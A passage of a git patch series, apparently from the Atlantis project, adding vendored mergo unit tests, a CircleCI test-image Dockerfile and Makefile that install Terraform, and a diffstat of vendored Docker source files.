} + if b.Birth.IsZero() { + t.Fatalf("time.Time not merged in properly: b.Birth(%v) != dataMap['Birth'](%v)", b.Birth, dataMap["Birth"]) + } +} + +type simpleNested struct { + A int +} + +type structWithNestedPtrValueMap struct { + NestedPtrValue map[string]*simpleNested +} + +func TestNestedPtrValueInMap(t *testing.T) { + src := &structWithNestedPtrValueMap{ + NestedPtrValue: map[string]*simpleNested{ + "x": { + A: 1, + }, + }, + } + dst := &structWithNestedPtrValueMap{ + NestedPtrValue: map[string]*simpleNested{ + "x": {}, + }, + } + if err := Map(dst, src); err != nil { + t.FailNow() + } + if dst.NestedPtrValue["x"].A == 0 { + t.Fatalf("Nested Ptr value not merged in properly: dst.NestedPtrValue[\"x\"].A(%v) != src.NestedPtrValue[\"x\"].A(%v)", dst.NestedPtrValue["x"].A, src.NestedPtrValue["x"].A) + } +} + +func loadYAML(path string) (m map[string]interface{}) { + m = make(map[string]interface{}) + raw, _ := ioutil.ReadFile(path) + _ = yaml.Unmarshal(raw, &m) + return +} + +type structWithMap struct { + m map[string]structWithUnexportedProperty +} + +type structWithUnexportedProperty struct { + s string +} + +func TestUnexportedProperty(t *testing.T) { + a := structWithMap{map[string]structWithUnexportedProperty{ + "key": {"hello"}, + }} + b := structWithMap{map[string]structWithUnexportedProperty{ + "key": {"hi"}, + }} + defer func() { + if r := recover(); r != nil { + t.Errorf("Should not have panicked") + } + }() + Merge(&a, b) +} + +type structWithBoolPointer struct { + C *bool +} + +func TestBooleanPointer(t *testing.T) { + bt, bf := true, false + src := structWithBoolPointer{ + &bt, + } + dst := structWithBoolPointer{ + &bf, + } + if err := Merge(&dst, src); err != nil { + t.FailNow() + } + if dst.C == src.C { + t.Fatalf("dst.C should be a different pointer than src.C") + } + if *dst.C != *src.C { + t.Fatalf("dst.C should be true") + } +} diff --git a/vendor/github.com/imdario/mergo/pr80_test.go b/vendor/github.com/imdario/mergo/pr80_test.go new file mode 100644 index 0000000000..0b3220f3bc --- /dev/null +++ b/vendor/github.com/imdario/mergo/pr80_test.go @@ -0,0 +1,18 @@ +package mergo + +import ( + "testing" +) + +type mapInterface map[string]interface{} + +func TestMergeMapsEmptyString(t *testing.T) { + a := mapInterface{"s": ""} + b := mapInterface{"s": "foo"} + if err := Merge(&a, b); err != nil { + t.Fatal(err) + } + if a["s"] != "foo" { + t.Fatalf("b not merged in properly: a.s.Value(%s) != expected(%s)", a["s"], "foo") + } +} diff --git a/vendor/github.com/imdario/mergo/pr81_test.go b/vendor/github.com/imdario/mergo/pr81_test.go new file mode 100644 index 0000000000..e90e923feb --- /dev/null +++ b/vendor/github.com/imdario/mergo/pr81_test.go @@ -0,0 +1,42 @@ +package mergo + +import ( + "testing" +) + +func TestMapInterfaceWithMultipleLayer(t *testing.T) { + m1 := map[string]interface{}{ + "k1": map[string]interface{}{ + "k1.1": "v1", + }, + } + + m2 := map[string]interface{}{ + "k1": map[string]interface{}{ + "k1.1": "v2", + "k1.2": "v3", + }, + } + + if err := Map(&m1, m2, WithOverride); err != nil { + t.Fatalf("Error merging: %v", err) + } + + // Check overwrite of sub map works + expected := "v2" + actual := m1["k1"].(map[string]interface{})["k1.1"].(string) + if actual != expected { + t.Fatalf("Expected %v but got %v", + expected, + actual) + } + + // Check new key is merged + expected = "v3" + actual = m1["k1"].(map[string]interface{})["k1.2"].(string) + if actual != expected { + t.Fatalf("Expected %v but got %v", + expected, + actual) + } +} diff --git a/vendor/github.com/imdario/mergo/testdata/license.yml b/vendor/github.com/imdario/mergo/testdata/license.yml new file mode 100644 index 0000000000..2f1ad0082b --- /dev/null +++ b/vendor/github.com/imdario/mergo/testdata/license.yml @@ -0,0 +1,4 @@ +import: ../../../../fossene/db/schema/thing.yml +fields: + site: string + author: root diff --git a/vendor/github.com/imdario/mergo/testdata/thing.yml b/vendor/github.com/imdario/mergo/testdata/thing.yml new file mode 100644 index 0000000000..1a71041250 --- /dev/null +++ b/vendor/github.com/imdario/mergo/testdata/thing.yml @@ -0,0 +1,6 @@ +fields: + id: int + name: string + parent: ref "datu:thing" + status: enum(draft, public, private) + author: updater From 3c9188b2b84a7cc277cc49dda8dd8cb9f88cd9c7 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Wed, 20 Jun 2018 11:09:02 +0100 Subject: [PATCH 32/69] Add unit test image --- .circleci/config.yml | 2 +- Gopkg.lock | 2 +- Gopkg.toml | 4 ++++ testing/Dockerfile | 12 ++++++++++++ testing/Makefile | 11 +++++++++++ 5 files changed, 29 insertions(+), 2 deletions(-) create mode 100644 testing/Dockerfile create mode 100644 testing/Makefile diff --git a/.circleci/config.yml b/.circleci/config.yml index a632082603..50fb04e89c 100644 --- a/.circleci/config.yml +++ b/.circleci/config.yml @@ -3,7 +3,7 @@ jobs: test: working_directory: /go/src/github.com/runatlantis/atlantis docker: - - image: circleci/golang:1.10 + - image: runatlantis/testing-env steps: - checkout - run: make test-coverage diff --git a/Gopkg.lock b/Gopkg.lock index dc144cf25f..08daf551c6 100644 --- a/Gopkg.lock +++ b/Gopkg.lock @@ -352,6 +352,6 @@ [solve-meta] analyzer-name = "dep" analyzer-version = 1 - inputs-digest = "148489fcbc8e0f37944adc0eb2f9f187995790c5107188e9f4bebb79f7989434" + inputs-digest = "41fa7bc4fc730240930807e113d19be175d2a8dfbca5cdf084e8285a3a150e43" solver-name = "gps-cdcl" solver-version = 1 diff --git a/Gopkg.toml b/Gopkg.toml index 749d2f189b..1d0d53b35e 100644 --- a/Gopkg.toml +++ b/Gopkg.toml @@ -96,3 +96,7 @@ [[constraint]] branch = "master" name = "github.com/flynn-archive/go-shlex" + +[[constraint]] + name = "github.com/docker/docker" + version = "1.13.1" diff --git a/testing/Dockerfile b/testing/Dockerfile new file mode 100644 index 0000000000..b52eb89868 --- /dev/null +++ b/testing/Dockerfile @@ -0,0 +1,12 @@ +# This Dockerfile builds the docker image used for running circle ci tests. +# We need terraform installed for our full test suite so it installs that. +# It's updated by running make build-testing-image +FROM circleci/golang:1.10 + +# Install Terraform +ENV TERRAFORM_VERSION=0.11.7 +RUN curl -LOks https://releases.hashicorp.com/terraform/${TERRAFORM_VERSION}/terraform_${TERRAFORM_VERSION}_linux_amd64.zip && \ + sudo mkdir -p /usr/local/bin/tf/versions/${TERRAFORM_VERSION} && \ + sudo unzip terraform_${TERRAFORM_VERSION}_linux_amd64.zip -d /usr/local/bin/tf/versions/${TERRAFORM_VERSION} && \ + sudo ln -s /usr/local/bin/tf/versions/${TERRAFORM_VERSION}/terraform /usr/local/bin/terraform && \ + rm terraform_${TERRAFORM_VERSION}_linux_amd64.zip diff --git a/testing/Makefile b/testing/Makefile new file mode 100644 index 0000000000..49a5387eca --- /dev/null +++ b/testing/Makefile @@ -0,0 +1,11 @@ +TEST_IMAGE_NAME := runatlantis/testing-env + +.DEFAULT_GOAL := help +help: ## List targets & descriptions + @cat Makefile* | grep -E '^[a-zA-Z_-]+:.*?## .*$$' | sort | awk 'BEGIN {FS = ":.*?## "}; {printf "\033[36m%-30s\033[0m %s\n", $$1, $$2}' + +build-testing-image: ## Build and push the testing image + docker build -t $(TEST_IMAGE_NAME):$$(git rev-parse HEAD) . + docker tag $(TEST_IMAGE_NAME):$$(git rev-parse HEAD) $(TEST_IMAGE_NAME):latest + docker push $(TEST_IMAGE_NAME):$$(git rev-parse HEAD) + docker push $(TEST_IMAGE_NAME):latest From 07ff6972ebc6c915c8761765b11da95832091665 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Wed, 20 Jun 2018 11:35:41 +0100 Subject: [PATCH 33/69] Vendor docker --- Gopkg.lock | 18 +- Gopkg.toml | 2 +- vendor/github.com/docker/docker/.DEREK.yml | 17 + vendor/github.com/docker/docker/.dockerignore | 3 + .../docker/docker/.github/CODEOWNERS | 20 + .../docker/docker/.github/ISSUE_TEMPLATE.md | 12 +- .../docker/.github/PULL_REQUEST_TEMPLATE.md | 2 +- vendor/github.com/docker/docker/.gitignore | 19 +- vendor/github.com/docker/docker/.mailmap | 674 +- vendor/github.com/docker/docker/AUTHORS | 572 +- vendor/github.com/docker/docker/CHANGELOG.md | 290 +- .../github.com/docker/docker/CONTRIBUTING.md | 191 +- vendor/github.com/docker/docker/Dockerfile | 380 +- .../docker/docker/Dockerfile.aarch64 | 175 - .../github.com/docker/docker/Dockerfile.armhf | 182 - .../github.com/docker/docker/Dockerfile.e2e | 74 + .../docker/docker/Dockerfile.ppc64le | 188 - .../github.com/docker/docker/Dockerfile.s390x | 190 - .../docker/docker/Dockerfile.simple | 37 +- .../docker/docker/Dockerfile.solaris | 20 - .../docker/docker/Dockerfile.windows | 57 +- vendor/github.com/docker/docker/LICENSE | 2 +- vendor/github.com/docker/docker/MAINTAINERS | 176 +- vendor/github.com/docker/docker/Makefile | 124 +- vendor/github.com/docker/docker/NOTICE | 2 +- vendor/github.com/docker/docker/README.md | 309 +- vendor/github.com/docker/docker/ROADMAP.md | 122 +- vendor/github.com/docker/docker/TESTING.md | 71 + vendor/github.com/docker/docker/VENDORING.md | 11 +- vendor/github.com/docker/docker/VERSION | 1 - vendor/github.com/docker/docker/api/README.md | 16 +- vendor/github.com/docker/docker/api/common.go | 161 +- .../docker/docker/api/common_test.go | 341 - .../docker/docker/api/common_unix.go | 4 +- .../docker/docker/api/common_windows.go | 4 +- .../docker/docker/api/errors/errors.go | 47 - .../api/server/backend/build/backend.go | 136 + .../docker/api/server/backend/build/tag.go | 77 + .../docker/api/server/httputils/decoder.go | 2 +- .../docker/api/server/httputils/errors.go | 126 +- .../docker/api/server/httputils/form.go | 35 +- .../docker/api/server/httputils/form_test.go | 4 +- .../docker/api/server/httputils/httputils.go | 46 +- .../api/server/httputils/httputils_test.go | 18 + .../server/httputils/httputils_write_json.go | 4 +- .../httputils/httputils_write_json_go16.go | 16 - .../api/server/httputils/write_log_stream.go | 84 + .../docker/docker/api/server/middleware.go | 4 +- .../docker/api/server/middleware/cors.go | 6 +- .../docker/api/server/middleware/debug.go | 34 +- .../api/server/middleware/debug_test.go | 59 + .../api/server/middleware/experimental.go | 5 +- .../api/server/middleware/middleware.go | 5 +- .../docker/api/server/middleware/version.go | 35 +- .../api/server/middleware/version_test.go | 71 +- .../docker/docker/api/server/profiler.go | 41 - .../docker/api/server/router/build/backend.go | 22 +- .../docker/api/server/router/build/build.go | 13 +- .../api/server/router/build/build_routes.go | 307 +- .../api/server/router/checkpoint/backend.go | 2 +- .../server/router/checkpoint/checkpoint.go | 8 +- .../router/checkpoint/checkpoint_routes.go | 4 +- .../api/server/router/container/backend.go | 24 +- .../api/server/router/container/container.go | 19 +- .../router/container/container_routes.go | 207 +- .../api/server/router/container/copy.go | 65 +- .../api/server/router/container/exec.go | 23 +- .../api/server/router/container/inspect.go | 4 +- .../docker/api/server/router/debug/debug.go | 53 + .../api/server/router/debug/debug_routes.go | 12 + .../api/server/router/distribution/backend.go | 15 + .../router/distribution/distribution.go | 31 + .../distribution/distribution_routes.go | 138 + .../docker/api/server/router/experimental.go | 21 +- .../docker/api/server/router/image/backend.go | 23 +- .../docker/api/server/router/image/image.go | 18 +- .../api/server/router/image/image_routes.go | 162 +- .../docker/docker/api/server/router/local.go | 44 +- .../api/server/router/network/backend.go | 20 +- .../api/server/router/network/filter.go | 49 +- .../api/server/router/network/filter_test.go | 149 + .../api/server/router/network/network.go | 17 +- .../server/router/network/network_routes.go | 353 +- .../api/server/router/plugin/backend.go | 12 +- .../docker/api/server/router/plugin/plugin.go | 8 +- .../api/server/router/plugin/plugin_routes.go | 68 +- .../docker/docker/api/server/router/router.go | 2 +- .../api/server/router/session/backend.go | 11 + .../api/server/router/session/session.go | 29 + .../server/router/session/session_routes.go | 16 + .../docker/api/server/router/swarm/backend.go | 30 +- .../docker/api/server/router/swarm/cluster.go | 15 +- .../api/server/router/swarm/cluster_routes.go | 206 +- .../docker/api/server/router/swarm/helpers.go | 66 + .../api/server/router/system/backend.go | 13 +- .../docker/api/server/router/system/system.go | 25 +- .../api/server/router/system/system_routes.go | 70 +- .../api/server/router/volume/backend.go | 15 +- .../docker/api/server/router/volume/volume.go | 4 +- .../api/server/router/volume/volume_routes.go | 34 +- .../docker/api/server/router_swapper.go | 2 +- .../docker/docker/api/server/server.go | 61 +- .../docker/docker/api/server/server_test.go | 7 +- .../github.com/docker/docker/api/swagger.yaml | 4153 ++++++++--- .../api/templates/server/operation.gotmpl | 4 +- .../docker/docker/api/types/auth.go | 2 +- .../docker/api/types/backend/backend.go | 86 +- .../docker/docker/api/types/backend/build.go | 44 + .../docker/docker/api/types/blkiodev/blkio.go | 2 +- .../docker/docker/api/types/client.go | 96 +- .../docker/docker/api/types/configs.go | 16 +- .../docker/api/types/container/config.go | 13 +- .../api/types/container/container_changes.go | 21 + .../api/types/container/container_create.go | 4 +- .../api/types/container/container_top.go | 21 + .../api/types/container/container_update.go | 4 +- .../api/types/container/container_wait.go | 16 +- .../docker/api/types/container/host_config.go | 127 +- .../api/types/container/hostconfig_unix.go | 42 +- .../api/types/container/hostconfig_windows.go | 55 +- .../api/types/container/waitcondition.go | 22 + .../docker/docker/api/types/events/events.go | 12 +- .../docker/api/types/filters/example_test.go | 24 + .../docker/docker/api/types/filters/parse.go | 274 +- .../docker/api/types/filters/parse_test.go | 176 +- .../docker/api/types/graph_driver_data.go | 17 + .../docker/api/types/image/image_history.go | 37 + .../api/types/image_delete_response_item.go | 15 + .../docker/docker/api/types/mount/mount.go | 27 +- .../docker/api/types/network/network.go | 53 +- .../docker/docker/api/types/plugin.go | 16 +- .../docker/api/types/plugin_responses.go | 25 +- .../api/types/plugins/logdriver/entry.pb.go | 449 ++ .../api/types/plugins/logdriver/entry.proto | 8 + .../docker/api/types/plugins/logdriver/gen.go | 3 + .../docker/api/types/plugins/logdriver/io.go | 87 + .../docker/docker/api/types/port.go | 2 +- .../api/types/reference/image_reference.go | 34 - .../types/reference/image_reference_test.go | 72 - .../docker/api/types/registry/authenticate.go | 4 +- .../docker/api/types/registry/registry.go | 23 +- .../docker/docker/api/types/seccomp.go | 4 +- .../docker/docker/api/types/stats.go | 5 +- .../docker/api/types/strslice/strslice.go | 2 +- .../api/types/strslice/strslice_test.go | 2 +- .../docker/docker/api/types/swarm/common.go | 19 +- .../docker/docker/api/types/swarm/config.go | 35 + .../docker/api/types/swarm/container.go | 36 +- .../docker/docker/api/types/swarm/network.go | 26 +- .../docker/docker/api/types/swarm/node.go | 3 +- .../docker/docker/api/types/swarm/runtime.go | 27 + .../docker/api/types/swarm/runtime/gen.go | 3 + .../api/types/swarm/runtime/plugin.pb.go | 712 ++ .../api/types/swarm/runtime/plugin.proto | 20 + .../docker/docker/api/types/swarm/secret.go | 9 +- .../docker/docker/api/types/swarm/service.go | 39 +- .../docker/docker/api/types/swarm/swarm.go | 32 +- .../docker/docker/api/types/swarm/task.go | 93 +- .../docker/api/types/time/duration_convert.go | 2 +- .../api/types/time/duration_convert_test.go | 2 +- .../docker/docker/api/types/time/timestamp.go | 19 +- .../docker/api/types/time/timestamp_test.go | 6 +- .../docker/docker/api/types/types.go | 179 +- .../docker/api/types/versions/README.md | 4 +- .../docker/api/types/versions/compare.go | 2 +- .../docker/api/types/versions/compare_test.go | 2 +- .../docker/api/types/versions/v1p19/types.go | 2 +- .../docker/api/types/versions/v1p20/types.go | 2 +- .../docker/docker/api/types/volume.go | 17 +- .../{volumes_create.go => volume_create.go} | 8 +- .../{volumes_list.go => volume_list.go} | 8 +- .../adapters/containerimage/pull.go | 724 ++ .../builder-next/adapters/snapshot/layer.go | 113 + .../adapters/snapshot/snapshot.go | 445 ++ .../docker/builder/builder-next/builder.go | 419 ++ .../docker/builder/builder-next/controller.go | 157 + .../builder/builder-next/executor_unix.go | 17 + .../builder/builder-next/executor_windows.go | 21 + .../builder/builder-next/exporter/export.go | 146 + .../builder/builder-next/exporter/writer.go | 177 + .../builder/builder-next/reqbodyhandler.go | 67 + .../builder/builder-next/worker/worker.go | 323 + .../docker/docker/builder/builder.go | 170 +- .../docker/docker/builder/context.go | 260 - .../docker/docker/builder/context_test.go | 307 - .../docker/docker/builder/context_unix.go | 11 - .../docker/docker/builder/context_windows.go | 17 - .../docker/docker/builder/dockerfile/bflag.go | 176 - .../docker/builder/dockerfile/bflag_test.go | 187 - .../docker/builder/dockerfile/buildargs.go | 172 + .../builder/dockerfile/buildargs_test.go | 102 + .../docker/builder/dockerfile/builder.go | 547 +- .../docker/builder/dockerfile/builder_unix.go | 6 +- .../builder/dockerfile/builder_windows.go | 9 +- .../builder/dockerfile/clientsession.go | 76 + .../builder/dockerfile/command/command.go | 46 - .../builder/dockerfile/containerbackend.go | 146 + .../docker/docker/builder/dockerfile/copy.go | 560 ++ .../docker/builder/dockerfile/copy_test.go | 148 + .../docker/builder/dockerfile/copy_unix.go | 48 + .../docker/builder/dockerfile/copy_windows.go | 43 + .../docker/builder/dockerfile/dispatchers.go | 920 +-- .../builder/dockerfile/dispatchers_test.go | 719 +- .../builder/dockerfile/dispatchers_unix.go | 16 +- .../dockerfile/dispatchers_unix_test.go | 17 +- .../builder/dockerfile/dispatchers_windows.go | 57 +- .../dockerfile/dispatchers_windows_test.go | 50 +- .../docker/builder/dockerfile/envVarTest | 116 - .../docker/builder/dockerfile/evaluator.go | 396 +- .../builder/dockerfile/evaluator_test.go | 171 +- .../builder/dockerfile/evaluator_unix.go | 9 - .../builder/dockerfile/evaluator_windows.go | 13 - .../docker/builder/dockerfile/imagecontext.go | 121 + .../docker/builder/dockerfile/imageprobe.go | 63 + .../docker/builder/dockerfile/internals.go | 870 +-- .../builder/dockerfile/internals_linux.go | 88 + .../dockerfile/internals_linux_test.go | 138 + .../builder/dockerfile/internals_test.go | 130 +- .../builder/dockerfile/internals_unix.go | 38 - .../builder/dockerfile/internals_windows.go | 67 +- .../dockerfile/internals_windows_test.go | 40 +- .../docker/builder/dockerfile/metrics.go | 44 + .../builder/dockerfile/mockbackend_test.go | 148 + .../builder/dockerfile/parser/dumper/main.go | 36 - .../builder/dockerfile/parser/json_test.go | 61 - .../builder/dockerfile/parser/line_parsers.go | 361 - .../builder/dockerfile/parser/parser.go | 221 - .../builder/dockerfile/parser/parser_test.go | 173 - .../parser/testfile-line/Dockerfile | 35 - .../env_no_value/Dockerfile | 3 - .../shykes-nested-json/Dockerfile | 1 - .../testfiles/ADD-COPY-with-JSON/Dockerfile | 11 - .../testfiles/ADD-COPY-with-JSON/result | 10 - .../testfiles/brimstone-consuldock/Dockerfile | 26 - .../testfiles/brimstone-consuldock/result | 5 - .../brimstone-docker-consul/Dockerfile | 52 - .../testfiles/brimstone-docker-consul/result | 9 - .../testfiles/continueIndent/Dockerfile | 36 - .../parser/testfiles/continueIndent/result | 10 - .../testfiles/cpuguy83-nagios/Dockerfile | 54 - .../parser/testfiles/cpuguy83-nagios/result | 40 - .../parser/testfiles/docker/Dockerfile | 103 - .../dockerfile/parser/testfiles/docker/result | 24 - .../parser/testfiles/env/Dockerfile | 23 - .../dockerfile/parser/testfiles/env/result | 16 - .../testfiles/escape-after-comment/Dockerfile | 9 - .../testfiles/escape-after-comment/result | 3 - .../testfiles/escape-nonewline/Dockerfile | 7 - .../parser/testfiles/escape-nonewline/result | 3 - .../parser/testfiles/escape/Dockerfile | 6 - .../dockerfile/parser/testfiles/escape/result | 3 - .../parser/testfiles/escapes/Dockerfile | 14 - .../parser/testfiles/escapes/result | 6 - .../parser/testfiles/flags/Dockerfile | 10 - .../dockerfile/parser/testfiles/flags/result | 10 - .../parser/testfiles/health/Dockerfile | 10 - .../dockerfile/parser/testfiles/health/result | 9 - .../parser/testfiles/influxdb/Dockerfile | 15 - .../parser/testfiles/influxdb/result | 11 - .../Dockerfile | 1 - .../result | 1 - .../Dockerfile | 1 - .../result | 1 - .../Dockerfile | 1 - .../jeztah-invalid-json-single-quotes/result | 1 - .../Dockerfile | 1 - .../result | 1 - .../Dockerfile | 1 - .../result | 1 - .../parser/testfiles/json/Dockerfile | 8 - .../dockerfile/parser/testfiles/json/result | 8 - .../kartar-entrypoint-oddities/Dockerfile | 7 - .../kartar-entrypoint-oddities/result | 7 - .../lk4d4-the-edge-case-generator/Dockerfile | 48 - .../lk4d4-the-edge-case-generator/result | 29 - .../parser/testfiles/mail/Dockerfile | 16 - .../dockerfile/parser/testfiles/mail/result | 14 - .../testfiles/multiple-volumes/Dockerfile | 3 - .../parser/testfiles/multiple-volumes/result | 2 - .../parser/testfiles/mumble/Dockerfile | 7 - .../dockerfile/parser/testfiles/mumble/result | 4 - .../parser/testfiles/nginx/Dockerfile | 14 - .../dockerfile/parser/testfiles/nginx/result | 11 - .../parser/testfiles/tf2/Dockerfile | 23 - .../dockerfile/parser/testfiles/tf2/result | 20 - .../parser/testfiles/weechat/Dockerfile | 9 - .../parser/testfiles/weechat/result | 6 - .../parser/testfiles/znc/Dockerfile | 7 - .../dockerfile/parser/testfiles/znc/result | 5 - .../docker/builder/dockerfile/parser/utils.go | 176 - .../docker/builder/dockerfile/shell_parser.go | 329 - .../builder/dockerfile/shell_parser_test.go | 155 - .../docker/builder/dockerfile/support.go | 19 - .../docker/builder/dockerfile/support_test.go | 65 - .../docker/builder/dockerfile/utils_test.go | 2 +- .../docker/builder/dockerfile/wordsTest | 25 - .../docker/docker/builder/dockerignore.go | 48 - .../builder/dockerignore/dockerignore.go | 21 +- .../builder/dockerignore/dockerignore_test.go | 28 +- .../docker/docker/builder/fscache/fscache.go | 652 ++ .../docker/builder/fscache/fscache_test.go | 132 + .../docker/builder/fscache/naivedriver.go | 28 + .../github.com/docker/docker/builder/git.go | 28 - .../docker/docker/builder/remote.go | 157 - .../docker/builder/remotecontext/archive.go | 125 + .../docker/builder/remotecontext/detect.go | 180 + .../detect_test.go} | 48 +- .../docker/builder/remotecontext/filehash.go | 45 + .../docker/builder/remotecontext/generate.go | 3 + .../docker/builder/remotecontext/git.go | 35 + .../builder/remotecontext/git/gitutils.go | 204 + .../remotecontext/git/gitutils_test.go | 278 + .../builder/remotecontext/lazycontext.go | 102 + .../remotecontext}/mimetype.go | 15 +- .../builder/remotecontext/mimetype_test.go | 16 + .../docker/builder/remotecontext/remote.go | 127 + .../{ => remotecontext}/remote_test.go | 127 +- .../docker/builder/remotecontext/tarsum.go | 157 + .../docker/builder/remotecontext/tarsum.pb.go | 525 ++ .../docker/builder/remotecontext/tarsum.proto | 7 + .../builder/remotecontext/tarsum_test.go | 151 + .../builder/{ => remotecontext}/utils_test.go | 34 +- .../docker/docker/builder/tarsum.go | 158 - .../docker/docker/builder/tarsum_test.go | 265 - vendor/github.com/docker/docker/cli/cobra.go | 42 +- .../cli/command/bundlefile/bundlefile.go | 69 - .../cli/command/bundlefile/bundlefile_test.go | 77 - .../docker/cli/command/checkpoint/cmd.go | 24 - .../docker/cli/command/checkpoint/create.go | 58 - .../docker/cli/command/checkpoint/list.go | 62 - .../docker/cli/command/checkpoint/remove.go | 44 - .../docker/docker/cli/command/cli.go | 260 - .../docker/cli/command/commands/commands.go | 91 - .../docker/cli/command/container/attach.go | 130 - .../docker/cli/command/container/cmd.go | 46 - .../docker/cli/command/container/commit.go | 76 - .../docker/docker/cli/command/container/cp.go | 303 - .../docker/cli/command/container/create.go | 218 - .../docker/cli/command/container/diff.go | 58 - .../docker/cli/command/container/exec.go | 207 - .../docker/cli/command/container/exec_test.go | 116 - .../docker/cli/command/container/export.go | 59 - .../docker/cli/command/container/hijack.go | 116 - .../docker/cli/command/container/inspect.go | 47 - .../docker/cli/command/container/kill.go | 56 - .../docker/cli/command/container/list.go | 141 - .../docker/cli/command/container/logs.go | 87 - .../docker/cli/command/container/pause.go | 49 - .../docker/cli/command/container/port.go | 78 - .../docker/cli/command/container/prune.go | 75 - .../docker/cli/command/container/ps_test.go | 118 - .../docker/cli/command/container/rename.go | 51 - .../docker/cli/command/container/restart.go | 62 - .../docker/docker/cli/command/container/rm.go | 73 - .../docker/cli/command/container/run.go | 285 - .../docker/cli/command/container/start.go | 179 - .../docker/cli/command/container/stats.go | 243 - .../cli/command/container/stats_helpers.go | 226 - .../cli/command/container/stats_unit_test.go | 20 - .../docker/cli/command/container/stop.go | 67 - .../docker/cli/command/container/top.go | 58 - .../docker/cli/command/container/tty.go | 103 - .../docker/cli/command/container/unpause.go | 50 - .../docker/cli/command/container/update.go | 163 - .../docker/cli/command/container/utils.go | 143 - .../docker/cli/command/container/wait.go | 50 - .../docker/docker/cli/command/events_utils.go | 49 - .../docker/cli/command/formatter/container.go | 235 - .../cli/command/formatter/container_test.go | 398 -- .../docker/cli/command/formatter/custom.go | 51 - .../cli/command/formatter/custom_test.go | 28 - .../cli/command/formatter/disk_usage.go | 334 - .../docker/cli/command/formatter/formatter.go | 123 - .../docker/cli/command/formatter/image.go | 259 - .../cli/command/formatter/image_test.go | 333 - .../docker/cli/command/formatter/network.go | 117 - .../cli/command/formatter/network_test.go | 208 - .../docker/cli/command/formatter/reflect.go | 65 - .../cli/command/formatter/reflect_test.go | 66 - .../docker/cli/command/formatter/service.go | 322 - .../docker/cli/command/formatter/stats.go | 211 - .../cli/command/formatter/stats_test.go | 228 - .../docker/cli/command/formatter/volume.go | 121 - .../cli/command/formatter/volume_test.go | 189 - .../cli/command/idresolver/idresolver.go | 90 - .../docker/docker/cli/command/image/build.go | 477 -- .../docker/docker/cli/command/image/cmd.go | 33 - .../docker/cli/command/image/history.go | 99 - .../docker/docker/cli/command/image/import.go | 88 - .../docker/cli/command/image/inspect.go | 44 - .../docker/docker/cli/command/image/list.go | 96 - .../docker/docker/cli/command/image/load.go | 77 - .../docker/docker/cli/command/image/prune.go | 92 - .../docker/docker/cli/command/image/pull.go | 84 - .../docker/docker/cli/command/image/push.go | 61 - .../docker/docker/cli/command/image/remove.go | 77 - .../docker/docker/cli/command/image/save.go | 57 - .../docker/docker/cli/command/image/tag.go | 41 - .../docker/docker/cli/command/image/trust.go | 381 - .../docker/cli/command/image/trust_test.go | 57 - .../docker/docker/cli/command/in.go | 75 - .../docker/cli/command/inspect/inspector.go | 195 - .../cli/command/inspect/inspector_test.go | 221 - .../docker/docker/cli/command/network/cmd.go | 28 - .../docker/cli/command/network/connect.go | 64 - .../docker/cli/command/network/create.go | 226 - .../docker/cli/command/network/disconnect.go | 41 - .../docker/cli/command/network/inspect.go | 45 - .../docker/docker/cli/command/network/list.go | 76 - .../docker/cli/command/network/prune.go | 73 - .../docker/cli/command/network/remove.go | 43 - .../docker/docker/cli/command/node/cmd.go | 43 - .../docker/docker/cli/command/node/demote.go | 36 - .../docker/docker/cli/command/node/inspect.go | 144 - .../docker/docker/cli/command/node/list.go | 115 - .../docker/docker/cli/command/node/opts.go | 60 - .../docker/docker/cli/command/node/promote.go | 36 - .../docker/docker/cli/command/node/ps.go | 93 - .../docker/docker/cli/command/node/remove.go | 56 - .../docker/docker/cli/command/node/update.go | 121 - .../docker/docker/cli/command/out.go | 69 - .../docker/docker/cli/command/plugin/cmd.go | 31 - .../docker/cli/command/plugin/create.go | 125 - .../docker/cli/command/plugin/disable.go | 36 - .../docker/cli/command/plugin/enable.go | 47 - .../docker/cli/command/plugin/inspect.go | 42 - .../docker/cli/command/plugin/install.go | 208 - .../docker/docker/cli/command/plugin/list.go | 63 - .../docker/docker/cli/command/plugin/push.go | 71 - .../docker/cli/command/plugin/remove.go | 55 - .../docker/docker/cli/command/plugin/set.go | 22 - .../docker/cli/command/plugin/upgrade.go | 100 - .../docker/docker/cli/command/prune/prune.go | 50 - .../docker/docker/cli/command/registry.go | 186 - .../docker/cli/command/registry/login.go | 85 - .../docker/cli/command/registry/logout.go | 77 - .../docker/cli/command/registry/search.go | 126 - .../docker/docker/cli/command/secret/cmd.go | 25 - .../docker/cli/command/secret/create.go | 79 - .../docker/cli/command/secret/inspect.go | 45 - .../docker/docker/cli/command/secret/ls.go | 68 - .../docker/cli/command/secret/remove.go | 57 - .../docker/docker/cli/command/secret/utils.go | 76 - .../docker/docker/cli/command/service/cmd.go | 29 - .../docker/cli/command/service/create.go | 100 - .../docker/cli/command/service/inspect.go | 84 - .../cli/command/service/inspect_test.go | 129 - .../docker/docker/cli/command/service/list.go | 158 - .../docker/docker/cli/command/service/logs.go | 163 - .../docker/docker/cli/command/service/opts.go | 648 -- .../docker/cli/command/service/opts_test.go | 107 - .../docker/cli/command/service/parse.go | 68 - .../docker/docker/cli/command/service/ps.go | 76 - .../docker/cli/command/service/remove.go | 47 - .../docker/cli/command/service/scale.go | 96 - .../docker/cli/command/service/trust.go | 96 - .../docker/cli/command/service/update.go | 849 --- .../docker/cli/command/service/update_test.go | 384 - .../docker/docker/cli/command/stack/cmd.go | 35 - .../docker/docker/cli/command/stack/common.go | 60 - .../docker/docker/cli/command/stack/deploy.go | 357 - .../cli/command/stack/deploy_bundlefile.go | 83 - .../docker/docker/cli/command/stack/list.go | 113 - .../docker/docker/cli/command/stack/opts.go | 49 - .../docker/docker/cli/command/stack/ps.go | 61 - .../docker/docker/cli/command/stack/remove.go | 112 - .../docker/cli/command/stack/services.go | 79 - .../docker/docker/cli/command/swarm/cmd.go | 28 - .../docker/docker/cli/command/swarm/init.go | 85 - .../docker/docker/cli/command/swarm/join.go | 69 - .../docker/cli/command/swarm/join_token.go | 105 - .../docker/docker/cli/command/swarm/leave.go | 44 - .../docker/docker/cli/command/swarm/opts.go | 209 - .../docker/cli/command/swarm/opts_test.go | 37 - .../docker/docker/cli/command/swarm/unlock.go | 54 - .../docker/cli/command/swarm/unlock_key.go | 79 - .../docker/docker/cli/command/swarm/update.go | 72 - .../docker/docker/cli/command/system/cmd.go | 26 - .../docker/docker/cli/command/system/df.go | 56 - .../docker/cli/command/system/events.go | 140 - .../docker/docker/cli/command/system/info.go | 334 - .../docker/cli/command/system/inspect.go | 203 